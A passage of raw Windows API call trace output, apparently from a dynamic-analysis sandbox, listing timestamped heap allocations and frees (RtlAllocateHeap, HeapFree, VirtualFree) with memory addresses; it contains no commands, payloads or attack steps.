0x22b34a7c9d0 [0085.597] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7c130 [0085.597] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7c040 [0085.597] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7c700 [0085.597] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7c730 [0085.598] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7c310 [0085.598] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7c370 [0085.598] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7ca30 [0085.598] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7c070 [0085.598] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7c0a0 [0085.598] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7c5b0 [0085.598] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7c0d0 [0085.599] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7c100 [0085.599] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7c7f0 [0085.599] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7c5e0 [0085.599] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7c880 [0085.599] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7c400 [0085.599] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7c340 [0085.600] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7c610 [0085.600] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7bf20 [0085.600] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7c250 [0085.600] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7c820 [0085.600] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7c280 [0085.600] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7c460 [0085.600] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7c2b0 [0085.601] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7ca60 [0085.601] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7c3a0 [0085.601] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7c850 [0085.601] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7c490 [0085.601] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7c8b0 [0085.601] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7d300 [0085.601] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7d120 [0085.602] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7d360 [0085.602] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7d570 [0085.602] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7cdc0 [0085.602] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7ce80 [0085.602] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7d390 [0085.602] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7d270 [0085.603] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7d690 [0085.603] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7d450 [0085.603] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7cd00 [0085.603] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7d5a0 [0085.603] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7d3f0 [0085.603] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7d630 [0085.604] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7cf10 [0085.604] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7d180 [0085.604] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7d330 [0085.604] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7cee0 [0085.604] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7cfd0 [0085.604] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7ce50 [0085.604] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7cd30 [0085.604] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7d000 [0085.607] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7d030 [0085.607] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7cc40 [0085.607] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7d660 [0085.607] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7d3c0 [0085.607] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7d150 [0085.607] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7d1b0 [0085.608] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7d420 [0085.608] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7cac0 [0085.608] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7ceb0 [0085.608] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7cbb0 [0085.608] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7d0f0 [0085.608] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7d2a0 [0085.609] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7d240 [0085.609] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7d1e0 [0085.609] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7d210 [0085.609] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7d540 [0085.609] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7d2d0 [0085.609] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7cf40 [0085.609] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7d5d0 [0085.610] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7caf0 [0085.610] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7d480 [0085.610] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7cca0 [0085.610] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x10000) returned 0x22b34a83230 [0085.611] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a736f0 | out: hHeap=0x22b349a0000) returned 1 [0085.611] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7d060 [0085.611] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7d4b0 [0085.612] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7d4e0 [0085.612] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7d600 [0085.612] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7d510 [0085.612] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7cb20 [0085.612] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7cf70 [0085.613] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7cc70 [0085.613] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7d090 [0085.613] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7cb50 [0085.613] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7cdf0 [0085.613] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7ccd0 [0085.613] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7cb80 [0085.613] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7cfa0 [0085.614] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7cbe0 [0085.614] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7cc10 [0085.614] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7cd60 [0085.614] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7ce20 [0085.614] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7cd90 [0085.614] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7d0c0 [0085.614] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a93400 [0085.615] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a93940 [0085.615] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a935e0 [0085.615] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a93d30 [0085.615] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a93670 [0085.615] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a934c0 [0085.616] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a93af0 [0085.616] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a93c10 [0085.616] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a93d90 [0085.616] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a93310 [0085.616] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a93550 [0085.616] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a932e0 [0085.617] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a93970 [0085.617] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a936a0 [0085.617] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a933a0 [0085.617] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a93df0 [0085.617] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a93460 [0085.617] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a93490 [0085.617] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a93eb0 [0085.618] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a934f0 [0085.618] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a93640 [0085.618] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a93ca0 [0085.618] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a939d0 [0085.618] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a93760 [0085.619] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a93dc0 [0085.619] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a93ac0 [0085.619] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a93b80 [0085.619] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a936d0 [0085.619] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a939a0 [0085.619] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a93b20 [0085.620] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a93a00 [0085.620] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a93370 [0085.620] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a93580 [0085.620] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a93e20 [0085.620] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a933d0 [0085.677] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a93340 [0085.677] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a93910 [0085.677] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a93430 [0085.677] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a93850 [0085.677] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a938e0 [0085.678] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a93520 [0085.678] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a93cd0 [0085.678] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a93e50 [0085.678] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a935b0 [0085.678] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a93a30 [0085.678] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a93790 [0085.679] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a93d00 [0085.679] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a937c0 [0085.679] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a93610 [0085.679] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a93b50 [0085.679] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a93700 [0085.679] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a93a60 [0085.679] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a93730 [0085.680] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a937f0 [0085.680] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a93a90 [0085.680] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a93bb0 [0085.680] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a93be0 [0085.680] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a93c40 [0085.680] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a93c70 [0085.680] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a93d60 [0085.681] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a93820 [0085.681] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a93e80 [0085.681] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a93880 [0085.681] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a938b0 [0085.681] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a941e0 [0085.682] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a94960 [0085.682] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a945d0 [0085.682] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a94870 [0085.682] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a94480 [0085.682] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a944b0 [0085.682] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a94210 [0085.759] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a94900 [0085.759] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a94ab0 [0085.759] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a949c0 [0085.760] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a94600 [0085.760] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a944e0 [0085.760] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a94750 [0085.760] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a94240 [0085.760] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a94120 [0085.760] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a93fd0 [0085.760] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a943c0 [0085.761] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a949f0 [0085.761] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a946f0 [0085.761] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a94720 [0085.761] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a94390 [0085.761] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a94780 [0085.761] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a94270 [0085.762] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a945a0 [0086.213] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36c452e0 | out: hHeap=0x22b349a0000) returned 1 [0086.213] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a7f5e0 | out: hHeap=0x22b349a0000) returned 1 [0086.213] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349f4be0 | out: hHeap=0x22b349a0000) returned 1 [0086.213] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a2fb40 | out: hHeap=0x22b349a0000) returned 1 [0086.213] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3ad10 | out: hHeap=0x22b349a0000) returned 1 [0086.213] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a0e440 | out: hHeap=0x22b349a0000) returned 1 [0086.213] VirtualFree (lpAddress=0x22b374b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.226] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3cdb0 | out: hHeap=0x22b349a0000) returned 1 [0086.226] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a97f90 | out: hHeap=0x22b349a0000) returned 1 [0086.226] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a0f1f0 | out: hHeap=0x22b349a0000) returned 1 [0086.226] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a09d60 | out: hHeap=0x22b349a0000) returned 1 [0086.226] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a99790 | out: hHeap=0x22b349a0000) returned 1 [0086.226] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3da40 | out: hHeap=0x22b349a0000) returned 1 [0086.226] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a7c760 | out: hHeap=0x22b349a0000) returned 1 [0086.226] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a6eb30 | out: hHeap=0x22b349a0000) returned 1 [0086.226] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a98650 | out: hHeap=0x22b349a0000) returned 1 [0086.226] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a0a1e0 | out: hHeap=0x22b349a0000) returned 1 [0086.226] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a99ca0 | out: hHeap=0x22b349a0000) returned 1 [0086.226] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3d4a0 | out: hHeap=0x22b349a0000) returned 1 [0086.226] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a6b980 | out: hHeap=0x22b349a0000) returned 1 [0086.226] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a98f80 | out: hHeap=0x22b349a0000) returned 1 [0086.226] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3dec0 | out: hHeap=0x22b349a0000) returned 1 [0086.226] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3e4c0 | out: hHeap=0x22b349a0000) returned 1 [0086.226] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a6c1f0 | out: hHeap=0x22b349a0000) returned 1 [0086.226] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a98f20 | out: hHeap=0x22b349a0000) returned 1 [0086.226] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3c1b0 | out: hHeap=0x22b349a0000) returned 1 [0086.226] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a97f00 | out: hHeap=0x22b349a0000) returned 1 [0086.227] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a802a0 | out: hHeap=0x22b349a0000) returned 1 [0086.227] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a95170 | out: hHeap=0x22b349a0000) returned 1 [0086.227] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a089e0 | out: hHeap=0x22b349a0000) returned 1 [0086.227] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a99490 | out: hHeap=0x22b349a0000) returned 1 [0086.227] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3d9e0 | out: hHeap=0x22b349a0000) returned 1 [0086.227] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3e6d0 | out: hHeap=0x22b349a0000) returned 1 [0086.227] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a97630 | out: hHeap=0x22b349a0000) returned 1 [0086.227] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a6d5d0 | out: hHeap=0x22b349a0000) returned 1 [0086.227] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a98740 | out: hHeap=0x22b349a0000) returned 1 [0086.227] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a80840 | out: hHeap=0x22b349a0000) returned 1 [0086.227] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a93970 | out: hHeap=0x22b349a0000) returned 1 [0086.227] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3d140 | out: hHeap=0x22b349a0000) returned 1 [0086.227] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3e190 | out: hHeap=0x22b349a0000) returned 1 [0086.227] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a97e40 | out: hHeap=0x22b349a0000) returned 1 [0086.227] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a96520 | out: hHeap=0x22b349a0000) returned 1 [0086.227] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a94720 | out: hHeap=0x22b349a0000) returned 1 [0086.227] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3db90 | out: hHeap=0x22b349a0000) returned 1 [0086.227] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a93a30 | out: hHeap=0x22b349a0000) returned 1 [0086.227] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a0dd80 | out: hHeap=0x22b349a0000) returned 1 [0086.227] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a7f5b0 | out: hHeap=0x22b349a0000) returned 1 [0086.227] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3d800 | out: hHeap=0x22b349a0000) returned 1 [0086.227] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a95b90 | out: hHeap=0x22b349a0000) returned 1 [0086.227] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a0de70 | out: hHeap=0x22b349a0000) returned 1 [0086.227] 